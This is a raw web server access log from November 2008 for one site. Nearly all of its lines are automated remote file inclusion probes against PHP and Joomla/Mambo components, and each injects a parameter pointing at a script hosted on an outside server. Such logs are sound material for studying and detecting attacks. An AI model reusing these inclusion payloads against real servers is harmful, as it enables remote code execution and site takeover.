216.246.55.229 - - [02/Nov/2008:18:12:08 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:18:12:09 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:18:12:09 -0800] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:18:12:19 -0800] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:18:12:19 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:18:12:20 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.117.144.149 - - [02/Nov/2008:18:20:56 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.117.144.149 - - [02/Nov/2008:18:20:56 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:18:28:07 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:18:28:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:18:29:15 -0800] "GET /logs/access_080804.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:18:29:15 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:18:29:16 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:30:21 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:30:21 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:30:21 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:31:01 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:31:01 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.68.51.152 - - [02/Nov/2008:18:31:01 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:18:31:08 -0800] "GET /logs/access_080804.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:18:31:08 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:18:31:08 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:18:33:12 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:18:33:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:33:20 -0800] "GET /logs/access_080825.log/?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:33:20 -0800] "GET /?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:33:20 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.64" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:18:33:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:18:36:57 -0800] "GET /logs/access_080811.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:18:37:25 -0800] "GET /logs/access_080811.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:18:37:55 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:38:11 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:38:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:38:11 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:18:38:18 -0800] "GET /logs/access_080825.log//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:18:38:18 -0800] "GET /components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.109.245.113 - - [02/Nov/2008:18:38:18 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:18:39:13 -0800] "GET /logs/access_080811.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:41:04 -0800] "GET /logs/access_080804.log//plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:41:04 -0800] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:18:41:05 -0800] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:43:57 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:43:57 -0800] "GET /logs/access_080811.log%20%20//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:43:57 -0800] "GET /logs/access_080804.log%20%20//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.1.215.166 - - [02/Nov/2008:18:44:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "vspeaking.com"
116.126.143.88 - - [02/Nov/2008:18:46:00 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mahbaran.com/load/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.vspeaking.com"
85.214.37.182 - - [02/Nov/2008:18:48:27 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.dutchpokercrew.nl//images/comprofiler/tn68_446226dfa4ffbjpg/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
85.214.37.182 - - [02/Nov/2008:18:48:29 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.dutchpokercrew.nl//images/comprofiler/tn68_446226dfa4ffbjpg/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
210.219.173.249 - - [02/Nov/2008:18:49:39 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:18:53:50 -0800] "GET /logs/access_080811.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:01:36 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:01:36 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:01:36 -0800] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:09:39 -0800] "GET /logs/access_080825.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:09:39 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:09:39 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:19:10:04 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:19:10:04 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.144.158.163 - - [02/Nov/2008:19:10:04 -0800] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:19:16:45 -0800] "GET /logs/access_080811.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:31:20 -0800] "GET /logs/access_080901.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:34:41 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:34:42 -0800] "GET /components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:34:42 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:20 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:20 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:20 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:33 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:33 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:19:39:33 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:48 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:48 -0800] "GET /phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:48 -0800] "GET /logs/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /logs/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:51 -0800] "GET /logs/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:45:52 -0800] "GET /logs/phphtml.php?htmlclass_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
70.38.38.230 - - [02/Nov/2008:19:47:16 -0800] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.190.1.205 - - [02/Nov/2008:19:50:43 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.vspeaking.com"
85.190.1.205 - - [02/Nov/2008:19:50:43 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.vspeaking.com"
85.190.1.205 - - [02/Nov/2008:19:50:43 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:53:31 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:53:36 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [02/Nov/2008:19:53:42 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:19:55:20 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:19:55:20 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:19:56:19 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:19:56:19 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:19:56:41 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.116 - - [02/Nov/2008:19:56:43 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:19:57:17 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:19:57:17 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:19:57:21 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:19:57:23 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:19:57:23 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:19:57:23 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.12.53.176 - - [02/Nov/2008:19:57:24 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:57:29 -0800] "GET /logs/access_080825.log%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:19:57:34 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
70.38.38.230 - - [02/Nov/2008:19:57:56 -0800] "GET /logs/access_080804.log//plugins/safehtml/safehtml.php?dir[plugins]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
